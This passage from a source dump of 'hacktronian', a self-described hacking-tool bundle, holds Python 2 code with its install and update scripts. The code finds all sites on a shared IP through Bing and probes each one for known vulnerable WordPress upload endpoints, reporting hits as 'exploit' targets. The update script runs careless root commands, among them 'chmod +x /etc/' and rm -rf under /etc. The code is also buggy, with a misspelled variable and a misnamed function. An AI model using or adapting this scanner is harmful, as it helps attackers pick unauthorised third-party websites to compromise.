1605 |     BOLD = ''
1606 |     ENDC = ''
1607 | 
1608 | 
1609 | def grabsqli(ip):
1610 |     try:
1611 |         print bcolors.OKBLUE + "Check_Uplaod... "
1612 |         print '\n'
1613 | 
1614 |         page = 1
1615 |         while page <= 21:
1616 |             bing = "http://www.bing.com/search?q=ip%3A" + \
1617 |                 ip + "+upload&count=50&first=" + str(page)
1618 |             openbing = urllib2.urlopen(bing)
1619 |             readbing = openbing.read()
1620 |             findwebs = re.findall('<h2><a href="(.*?)"', readbing)
1621 |             sites = findwebs
1622 |             for i in sites:
1623 |                 try:
1624 |                     response = urllib2.urlopen(i).read()
1625 |                     checksqli(i)
1626 |                 except urllib2.HTTPError, e:
1627 |                     str(sites).strip(i)
1628 | 
1629 |             page = page + 10
1630 |     except:
1631 |         pass
1632 | 
1633 | 
1634 | def checksqli(sqli):
1635 |     responsetwo = urllib2.urlopen(sqli).read()
1636 |     find = re.findall('type="file"', responsetwo)
1637 |     if find:
1638 |         print(" Found ==> " + sqli)
1639 | 
1640 | 
1641 | def sqlscan():
1642 |     ip = raw_input('Enter IP -> ')
1643 |     grabsqli(ip)
1644 | 
1645 | 
1646 | def unique(seq):
1647 |     seen = set()
1648 |     return [seen.add(x) or x for x in seq if x not in seen]
1649 | 
1650 | 
1651 | def bing_all_grabber(s):
1652 |     lista = []
1653 |     page = 1
1654 |     while page <= 101:
1655 |         try:
1656 |             bing = "http://www.bing.com/search?q=ip%3A" + \
1657 |                 s + "+&count=50&first=" + str(page)
1658 |             openbing = urllib2.urlopen(bing)
1659 |             readbing = openbing.read()
1660 |             findwebs = re.findall('<h2><a href="(.*?)"', readbing)
1661 |             for i in range(len(findwebs)):
1662 |                 allnoclean = findwebs[i]
1663 |                 findall1 = re.findall('http://(.*?)/', allnoclean)
1664 |                 for idx, item in enumerate(findall1):
1665 |                     if 'www' not in item:
1666 |                         findall1[idx] = 'http://www.' + item + '/'
1667 |                     else:
1668 |                         findall1[idx] = 'http://' + item + '/'
1669 |                 lista.extend(findall1)
1670 | 
1671 |             page += 50
1672 |         except urllib2.URLError:
1673 |             pass
1674 | 
1675 |     final = unique(lista)
1676 |     return final
1677 | 
1678 | 
1679 | def check_wordpress(sites):
1680 |     wp = []
1681 |     for site in sites:
1682 |         try:
1683 |             if urllib2.urlopen(site + 'wp-login.php').getcode() == 200:
1684 |                 wp.append(site)
1685 |         except:
1686 |             pass
1687 | 
1688 |     return wp
1689 | 
1690 | 
1691 | def check_wpstorethemeremotefileupload(sites):
1692 |     wpstorethemeremotefileupload = []
1693 |     for site in sites:
1694 |         try:
1695 |             if urllib2.urlopen(site + 'wp-content/themes/WPStore/upload/index.php').getcode() == 200:
1696 |                 wpstorethemeremotefileupload.append(site)
1697 |         except:
1698 |             pass
1699 | 
1700 |     return wpstorethemeremotefileupload
1701 | 
1702 | 
1703 | def check_wpcontactcreativeform(sites):
1704 |     wpcontactcreativeform = []
1705 |     for site in sites:
1706 |         try:
1707 |             if urllib2.urlopen(site + 'wp-content/plugins/sexy-contact-form/includes/fileupload/index.php').getcode() == 200:
1708 |                 wpcontactcreativeform.append(site)
1709 |         except:
1710 |             pass
1711 | 
1712 |     return wpcontactcreativeform
1713 | 
1714 | 
1715 | def check_wplazyseoplugin(sites):
1716 |     wplazyseoplugin = []
1717 |     for site in sites:
1718 |         try:
1719 |             if urllib2.urlopen(site + 'wp-content/plugins/lazy-seo/lazyseo.php').getcode() == 200:
1720 |                 wplazyseoplugin.append(site)
1721 |         except:
1722 |             pass
1723 | 
1724 |     return wplazyseoplugin
1725 | 
1726 | 
1727 | def check_wpeasyupload(sites):
1728 |     wpeasyupload = []
1729 |     for site in sites:
1730 |         try:
1731 |             if urllib2.urlopen(site + 'wp-content/plugins/easy-comment-uploads/upload-form.php').getcode() == 200:
1732 |                 wpeasyupload.append(site)
1733 |         except:
1734 |             pass
1735 | 
1736 |     return wpeasyupload
1737 | 
1738 | 
1739 | def check_wpsymposium(sites):
1740 |     wpsymposium = []
1741 |     for site in sites:
1742 |         try:
1743 |             if urllib2.urlopen(site + 'wp-symposium/server/file_upload_form.php').getcode() == 200:
1744 |                 wpsycmium.append(site)
1745 |         except:
1746 |             pass
1747 | 
1748 |     return wpsymposium
1749 | 
1750 | 
1751 | def wpminiscanner():
1752 |     ip = raw_input('Enter IP : ')
1753 |     sites = bing_all_grabber(str(ip))
1754 |     wordpress = check_wordpress(sites)
1755 |     wpstorethemeremotefileupload = check_wpstorethemeremotefileupload(sites)
1756 |     wpcontactcreativeform = check_wpcontactcreativeform(sites)
1757 |     wplazyseoplugin = check_wplazyseoplugin(sites)
1758 |     wpeasyupload = check_wpeasyupload(sites)
1759 |     wpsymposium = check_wpsymposium(sites)
1760 |     for ss in wordpress:
1761 |         print ss
1762 |     print '[*] Found, ', len(wordpress), ' wordpress sites.'
1763 |     print '-' * 30 + '\n'
1764 |     for ss in wpstorethemeremotefileupload:
1765 |         print ss
1766 |     print '[*] Found, ', len(wpstorethemeremotefileupload), ' wp_storethemeremotefileupload exploit.'
1767 |     print '-' * 30 + '\n'
1768 |     for ss in wpcontactcreativeform:
1769 |         print ss
1770 |     print '[*] Found, ', len(wpcontactcreativeform), ' wp_contactcreativeform exploit.'
1771 |     print '-' * 30 + '\n'
1772 |     for ss in wplazyseoplugin:
1773 |         print ss
1774 |     print '[*] Found, ', len(wplazyseoplugin), ' wp_lazyseoplugin exploit.'
1775 |     print '-' * 30 + '\n'
1776 |     for ss in wpeasyupload:
1777 |         print ss
1778 |     print '[*] Found, ', len(wpeasyupload), ' wp_easyupload exploit.'
1779 |     print '-' * 30 + '\n'
1780 |     for ss in wpsymposium:
1781 |         print ss
1782 | 
1783 |     print '[*] Found, ', len(wpsymposium), ' wp_sympsiup exploit.'
1784 | 
1785 |     print '\n'
1786 | ############################
1787 | 
1788 | 
1789 | if __name__ == "__main__":
1790 |     try:
1791 |         menu()
1792 |     except KeyboardInterrupt:
1793 |         print(" Finishing up...\r"),
1794 |         time.sleep(0.25)
1795 | 


--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | clear
 3 | 
 4 | BLACK='\e[30m'
 5 | RED='\e[31m'
 6 | GREEN='\e[32m'
 7 | YELLOW='\e[33m'
 8 | BLUE='\e[34m'
 9 | PURPLE='\e[35m'
10 | CYAN='\e[36m'
11 | WHITE='\e[37m'
12 | NC='\e[0m'
13 | echo""
14 | echo -e "${RED}  _     _         ______ _    _ _______ ______   _____  ______  _____        ______   "
15 | echo " | |   | |  /\   / _____) |  / |_______|_____ \ / ___ \|  ___ \(_____)  /\  |  ___ \  "
16 | echo " | |__ | | /  \ | /     | | / / _       _____) ) |   | | |   | |  _    /  \ | |   | | "
17 | echo " |  __)| |/ /\ \| |     | |< < | |     (_____ (| |   | | |   | | | |  / /\ \| |   | | "
18 | echo " | |   | | |__| | \_____| | \ \| |_____      | | |___| | |   | |_| |_| |__| | |   | | "
19 | echo " |_|   |_|______|\______)_|  \_)\______)     |_|\_____/|_|   |_(_____)______|_|   |_| "
20 | echo -e "${RED}                                                      ~ Tools for Hacking by Mr. SAGE ${NC}"
21 | echo ""
22 | echo -e "${YELLOW} Twitter.com/thehackingsage | Instagram.com/thehackingsage | Github.com/thehackingsage ${NC} "
23 | echo ""
24 | echo "---------------------------------------------------------------------------------------"
25 | echo ""
26 | echo -e "${RED}[!] This Tool Must Run As ROOT [!]${NC}"
27 | echo ""
28 | echo -e "${CYAN}[>] Press ENTER to Install Hacktronian, CTRL+C to Abort.${NC}"
29 | read INPUT
30 | echo ""
31 | 
32 | if [ "$PREFIX" = "/data/data/com.termux/files/usr" ]; then
33 |     INSTALL_DIR="$PREFIX/usr/share/doc/hacktronian"
34 |     BIN_DIR="$PREFIX/usr/bin/"
35 |     pkg install -y git python2
36 | else
37 |     INSTALL_DIR="/usr/share/doc/hacktronian"
38 |     BIN_DIR="/usr/bin/"
39 | fi
40 | 
41 | echo "[✔] Checking directories...";
42 | if [ -d "$INSTALL_DIR" ]; then
43 |     echo "[!] A Directory hacktronian Was Found.. Do You Want To Replace It ? [y/n]:" ;
44 |     read mama
45 |     if [ "$mama" = "y" ]; then
46 |         rm -R "$INSTALL_DIR"
47 |     else
48 |         exit
49 |     fi
50 | fi
51 | 
52 | echo "[✔] Installing ...";
53 | echo "";
54 | git clone https://github.com/thehackingsage/hacktronian.git "$INSTALL_DIR";
55 | echo "#!/bin/bash
56 | python $INSTALL_DIR/hacktronian.py" '${1+"$@"}' > hacktronian;
57 | chmod +x hacktronian;
58 | sudo cp hacktronian /usr/bin/;
59 | rm hacktronian;
60 | 
61 | 
62 | if [ -d "$INSTALL_DIR" ] ;
63 | then
64 |     echo "";
65 |     echo "[✔] Successfuly Installed !!! [✔]";
66 |     echo "";
67 |     echo "[✔]========================================================================[✔]";
68 |     echo "[✔] ✔✔✔ All Is Done!! you can execute tool by typing hacktronian !! ✔✔✔ [✔]";
69 |     echo "[✔]========================================================================[✔]";
70 |     echo "";
71 | else
72 |     echo "[✘] Installation Failed !!! [✘]";
73 |     exit
74 | fi
75 | 


--------------------------------------------------------------------------------
/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/hacktronian/dd27d7303aec7c3d430ef2edc197ea761979f769/logo.png


--------------------------------------------------------------------------------
/update.sh:
--------------------------------------------------------------------------------
 1 | #
 2 | #   _   _   ___  _____  _   _____________ _____ _   _ _____  ___   _   _ 
 3 | #  | | | | / _ \/  __ \| | / /_   _| ___ \  _  | \ | |_   _|/ _ \ | \ | |
 4 | #  | |_| |/ /_\ \ /  \/| |/ /  | | | |_/ / | | |  \| | | | / /_\ \|  \| |
 5 | #  |  _  ||  _  | |    |    \  | | |    /| | | | . ` | | | |  _  || . ` |
 6 | #  | | | || | | | \__/\| |\  \ | | | |\ \\ \_/ / |\  |_| |_| | | || |\  |
 7 | #  \_| |_/\_| |_/\____/\_| \_/ \_/ \_| \_|\___/\_| \_/\___/\_| |_/\_| \_/
 8 | #
 9 | #                   ~ Tools For Hacking by Mr. SAGE ~
10 | 
11 | clear
12 | 
13 | sudo chmod +x /etc/
14 | 
15 | clear
16 | 
17 | sudo chmod +x /usr/share/doc
18 | 
19 | clear
20 | 
21 | sudo rm -rf /usr/share/doc/hacktronian/
22 | 
23 | clear
24 | 
25 | cd /etc/
26 | 
27 | clear
28 | 
29 | sudo rm -rf /etc/thehackingsage
30 | 
31 | clear
32 | 
33 | mkdir thehackingsage
34 | 
35 | clear
36 | 
37 | cd thehackingsage
38 | 
39 | clear
40 | 
41 | git clone https://github.com/thehackingsage/hacktronian.git
42 | 
43 | clear
44 | 
45 | cd hacktronian
46 | 
47 | clear
48 | 
49 | sudo chmod +x install.sh
50 | 
51 | clear
52 | 
53 | ./install.sh
54 | 
55 | clear
56 | 


--------------------------------------------------------------------------------